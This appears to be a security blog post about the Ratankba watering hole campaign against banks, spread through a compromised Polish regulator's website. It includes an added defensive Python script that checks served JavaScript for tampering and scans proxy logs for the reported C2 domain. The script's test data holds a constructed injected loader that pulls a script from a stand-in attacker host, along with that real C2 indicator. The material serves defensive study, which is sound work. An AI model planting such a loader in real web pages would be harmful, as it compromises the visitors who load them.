Banks and financial institutions in more than 30 countries have been targeted by new malware in a fresh round of watering hole attacks, according to recent reports. (A watering hole attack, it must be remembered, is one in which the attacker compromises a website that the intended victims, usually a particular group or organization, visit regularly, and plants malicious content there. Eventually some member of the target group visits the site and gets infected.)
Reports say that the malware targeting banks and financial organizations has been active since at least October of the previous year. The attack was first detected when a bank in Poland found the malware on one of its systems.
A recent report on a Polish news website said that several Polish banks had detected suspicious files on their systems, along with encrypted traffic going to foreign IP addresses. The banks' investigations traced the source of infection to the official website of the Polish Financial Supervision Authority (KNF), the regulator of the Polish financial sector. The KNF website had been compromised by an attacker who modified one of the JavaScript files it served; that modified JavaScript file was the infection vector.
As per reports, no funds were found to have been stolen from accounts. Researchers analyzing the malware say the campaign, which uses a trojan to deliver malicious files to systems, relies on the compromised sites to redirect visitors to a customized exploit kit. The exploit kit is configured to serve its payload only to visitors from about 150 IP addresses in 31 countries, including addresses belonging to banks, telecoms and internet firms. Gating delivery on the visitor's source IP is what keeps such a watering hole invisible to ordinary visitors, and to researchers browsing from outside the target list, which is one reason it can go unnoticed for months.
Attackers are getting more sophisticated. A traditional antivirus program or basic system security software alone will not stop the advanced malware now aimed at organizations and companies, and the malware targeting banks and financial institutions here is one such case. Researchers have found that certain code strings in this malware, which they call Ratankba, resemble code in malware previously used by the North Korean group Lazarus. Ratankba connects to eye-watch[.]in for command-and-control communications and then downloads a hacking tool (detected generically as a Hacktool).
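The two observable facts in the reports above, a modified JavaScript file on the compromised site and outbound traffic to the command-and-control domain eye-watch[.]in, each give a defender something concrete to check. The following script is an added example written for this page, not code from the original post or from any of the researchers cited; it shows (1) the check a site owner can run, comparing served JavaScript against a known-good hash baseline and listing any foreign hosts a changed file now references, and (2) the check a bank's security team can run over proxy logs, finding which internal hosts contacted the C2 domain or any of its subdomains. The file contents, hostnames other than eye-watch.in, and proxy log lines are all constructed for the example and are not from any real incident.

```python
"""Added example: two defender-side checks for the watering hole described above.

Check 1 (site owner): has any served JavaScript changed since the last known-good
deploy, and does the changed file now pull in content from a host we do not own?
Check 2 (bank): which internal hosts contacted the reported C2 domain?
"""
import hashlib
import re
from urllib.parse import urlsplit

# Command-and-control domain named in the reports above (written defanged in the text).
# Subdomains are matched too, since a C2 domain is rarely contacted only at its apex.
C2_DOMAINS = {"eye-watch.in"}


# ---- Check 1: integrity of served JavaScript ---------------------------------

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_baseline(files: dict[str, bytes]) -> dict[str, str]:
    """Known-good hashes. In practice these come from the clean deploy artefact
    (assumed to exist), never from the live web root you are auditing."""
    return {name: sha256_hex(body) for name, body in files.items()}


# Absolute http(s) URL with its host captured; enough to spot an injected loader.
EXTERNAL_REF = re.compile(r"https?://([A-Za-z0-9.-]+)")


def audit_scripts(baseline: dict[str, str], current: dict[str, bytes],
                  own_hosts: set[str]) -> dict[str, list[str]]:
    """Return {changed_file: [foreign hosts it now references]}.

    A file whose hash differs from the baseline is a finding on its own; one that
    additionally loads something from a host outside own_hosts has exactly the
    shape of the injected JavaScript described in the reports."""
    findings: dict[str, list[str]] = {}
    for name, body in current.items():
        if baseline.get(name) == sha256_hex(body):
            continue  # unchanged since the clean deploy
        text = body.decode("utf-8", errors="replace")
        hosts = {h.lower() for h in EXTERNAL_REF.findall(text)} - own_hosts
        findings[name] = sorted(hosts)
    return findings


# ---- Check 2: proxy log scan for the C2 domain -------------------------------

# Constructed proxy log lines (not from any real incident): "time src method url".
# CONNECT entries carry "host:port" with no scheme, as many proxies log TLS tunnels.
SAMPLE_PROXY_LOG = """\
2017-02-03T09:12:44Z 10.20.1.15 GET https://regulator.example/index.html
2017-02-03T09:12:45Z 10.20.1.15 GET https://regulator.example/js/site.js
2017-02-03T09:12:47Z 10.20.1.15 GET https://cdn.eye-watch.in/update.dat
2017-02-03T09:15:02Z 10.20.3.8 CONNECT eye-watch.in:443
2017-02-03T09:16:10Z 10.20.4.22 GET https://bank.example/login
2017-02-03T09:17:30Z 10.20.4.22 GET https://notaneye-watch.in/
"""


def host_of(url: str) -> str:
    """Normalise both 'scheme://host/path' and bare 'host:port' to a hostname."""
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()


def matches_c2(host: str) -> bool:
    # Exact apex or a true subdomain; 'notaneye-watch.in' must not match.
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def hosts_contacting_c2(log_text: str) -> dict[str, list[str]]:
    """Map internal source IP -> sorted C2 hostnames it reached."""
    hits: dict[str, set[str]] = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # malformed or truncated line; skip rather than crash the sweep
        _ts, src, _method, url = parts[:4]
        host = host_of(url)
        if matches_c2(host):
            hits.setdefault(src, set()).add(host)
    return {src: sorted(hosts) for src, hosts in sorted(hits.items())}


if __name__ == "__main__":
    # Constructed site content: a clean file, then the same file with an injected loader.
    clean = {"js/site.js": b"var page = 'home';\n"}
    tampered = {"js/site.js": clean["js/site.js"]
                + b"var s=document.createElement('script');"
                  b"s.src='https://attacker.example/loader.js';"
                  b"document.head.appendChild(s);\n"}
    baseline = build_baseline(clean)
    print("changed scripts:", audit_scripts(baseline, tampered, {"regulator.example"}))
    print("hosts contacting C2:", hosts_contacting_c2(SAMPLE_PROXY_LOG))
```

The hash baseline must come from a trusted artefact rather than from the live server, since a file modified before the baseline was taken would be silently accepted. The log check matches on hostname rather than on a substring, so look-alike domains do not produce false hits and subdomains of the C2 domain do.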
Researchers note that if Lazarus is indeed behind this campaign, the group has shifted both its techniques and its targets, which points to growing sophistication. Anyone relying on just an antivirus program or the best virus scanner to protect systems and networks should be aware that combating malware is no longer that easy: defenders need to match the sophistication of the attackers and their advanced malware. Fortunately, corporate users today are becoming more vigilant and better educated on such matters.
————————————————————————————————————————————————–
Related Resources:
https://antivirus.comodo.com/blog/computer-safety/five-best-virus-and-malware-removal-tools/